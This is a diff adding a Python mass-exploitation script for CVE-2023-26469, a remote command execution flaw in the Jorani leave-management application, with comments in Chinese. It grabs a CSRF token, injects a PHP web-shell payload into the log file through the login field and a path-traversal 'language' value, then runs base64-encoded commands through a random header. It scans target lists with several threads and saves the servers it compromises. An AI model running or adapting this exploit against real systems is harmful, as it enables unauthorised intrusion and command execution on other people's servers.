|
| 1 | +# 作者: VulnExpo |
| 2 | +# 日期: 2023-11-13 |
| 3 | + |
| 4 | +import argparse |
| 5 | +import threading |
| 6 | +import requests |
| 7 | +import datetime |
| 8 | +import re |
| 9 | +import base64 |
| 10 | +import random |
| 11 | +import string |
| 12 | +requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) |
| 13 | + |
| 14 | +def check_for_vulnerability(url, proxies=None, success_file=None): |
| 15 | + try: |
| 16 | + # 正则表达式模式 |
| 17 | + CSRF_PATTERN = re.compile('<input type="hidden" name="csrf_test_jorani" value="(.*?)"') |
| 18 | + CMD_PATTERN = re.compile('---------(.*?)---------', re.S) |
| 19 | + |
| 20 | + # 定义目标 URL 路径 |
| 21 | + URLS = { |
| 22 | + 'login': '/session/login', |
| 23 | + 'view': '/pages/view/', |
| 24 | + } |
| 25 | + |
| 26 | + # 生成随机的请求头名称 |
| 27 | + def generate_random_header_name(): |
| 28 | + alphabet = string.ascii_uppercase |
| 29 | + return ''.join(random.choice(alphabet) for i in range(12)) |
| 30 | + |
| 31 | + HEADER_NAME = generate_random_header_name() |
| 32 | + |
| 33 | + # 恶意负载 |
| 34 | + POISON_PAYLOAD = "<?php if(isset($_SERVER['HTTP_" + HEADER_NAME + "'])){system(base64_decode($_SERVER['HTTP_" + HEADER_NAME + "']));} ?>" |
| 35 | + PATH_TRAV_PAYLOAD = "../../application/logs" |
| 36 | + command = "id" |
| 37 | + |
| 38 | + # 创建会话并获取会话 cookie |
| 39 | + session = requests.Session() |
| 40 | + # print("Requesting session cookie") |
| 41 | + response = session.get(url + URLS['login'], verify=False) |
| 42 | + cookies = session.cookies.get_dict() |
| 43 | + |
| 44 | + # 提取 CSRF 令牌 |
| 45 | + csrf_token = re.findall(CSRF_PATTERN, response.text)[0] |
| 46 | + # print(f"Poisoning log file with payload: '{POISON_PAYLOAD}'") |
| 47 | + # print(f"Setting path traversal to '{PATH_TRAV_PAYLOAD}'") |
| 48 | + # print(f"Recovered CSRF Token: {csrf_token}") |
| 49 | + |
| 50 | + # 向服务器发送恶意请求以污染日志文件 |
| 51 | + data = { |
| 52 | + "csrf_test_jorani": csrf_token, |
| 53 | + "last_page": "session/login", |
| 54 | + "language": PATH_TRAV_PAYLOAD, |
| 55 | + "login": POISON_PAYLOAD, |
| 56 | + "CipheredValue": "DummyPassword" |
| 57 | + } |
| 58 | + session.post(url + URLS['login'], data=data) |
| 59 | + |
| 60 | + log_file_name = f"log-{datetime.date.today().isoformat()}" |
| 61 | + |
| 62 | + # 设置特殊请求头以执行操作系统命令 |
| 63 | + BypassRedirect = { |
| 64 | + 'X-REQUESTED-WITH': 'XMLHttpRequest', |
| 65 | + HEADER_NAME: base64.b64encode(f"echo ---------;{command} 2>&1;echo ---------;".encode()).decode() |
| 66 | + } |
| 67 | + response = session.get(url + URLS['view'] + log_file_name, headers=BypassRedirect) |
| 68 | + command_output = re.findall(CMD_PATTERN, response.text) |
| 69 | + try: |
| 70 | + print(f"目标 {url} 响应内容 {command_output[0].strip()}") |
| 71 | + with open(success_file, 'a') as s_file: |
| 72 | + s_file.write(f"++++++++++++++++++\n") |
| 73 | + s_file.write(f"目标URL: {url}\n") |
| 74 | + s_file.write(f"响应内容: {command_output[0].strip()}\n\n") |
| 75 | + except Exception as e: |
| 76 | + print(f"目标 {url} 发生异常:{e}") |
| 77 | + return False |
| 78 | + except Exception as e: |
| 79 | + print(f"目标 {url} 发生异常:{e}") |
| 80 | + |
| 81 | +def scan_targets(targets, proxies=None, success_file=None): |
| 82 | + for target in targets: |
| 83 | + target = target.strip() |
| 84 | + check_for_vulnerability(target, proxies, success_file) |
| 85 | + |
| 86 | +def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4): |
| 87 | + threads = [] |
| 88 | + |
| 89 | + for i in range(num_threads): |
| 90 | + thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file)) |
| 91 | + threads.append(thread) |
| 92 | + |
| 93 | + for thread in threads: |
| 94 | + thread.start() |
| 95 | + |
| 96 | + for thread in threads: |
| 97 | + thread.join() |
| 98 | + |
| 99 | +if __name__ == '__main__': |
| 100 | + parser = argparse.ArgumentParser(description="Jorani远程命令执行漏洞CVE-2023-26469") |
| 101 | + parser.add_argument("-u", "--url", help="目标URL") |
| 102 | + parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt") |
| 103 | + parser.add_argument("-t", "--threads", type=int, default=4, help="线程数,默认为4") |
| 104 | + parser.add_argument("-p", "--proxy", help="代理服务器地址(例如:http://localhost:8080)") |
| 105 | + args = parser.parse_args() |
| 106 | + |
| 107 | + if not args.url and not args.file: |
| 108 | + print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。") |
| 109 | + exit(1) |
| 110 | + |
| 111 | + if args.url: |
| 112 | + urls = [args.url] |
| 113 | + elif args.file: |
| 114 | + with open(args.file, 'r') as file: |
| 115 | + urls = file.readlines() |
| 116 | + |
| 117 | + success_file = 'success_targets.txt' |
| 118 | + |
| 119 | + proxies = { |
| 120 | + "http": args.proxy, |
| 121 | + "https": args.proxy |
| 122 | + } if args.proxy else None |
| 123 | + |
| 124 | + multi_threaded_scan(urls, proxies, success_file, args.threads) |
| 125 | + |
| 126 | + print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。") |
0 commit comments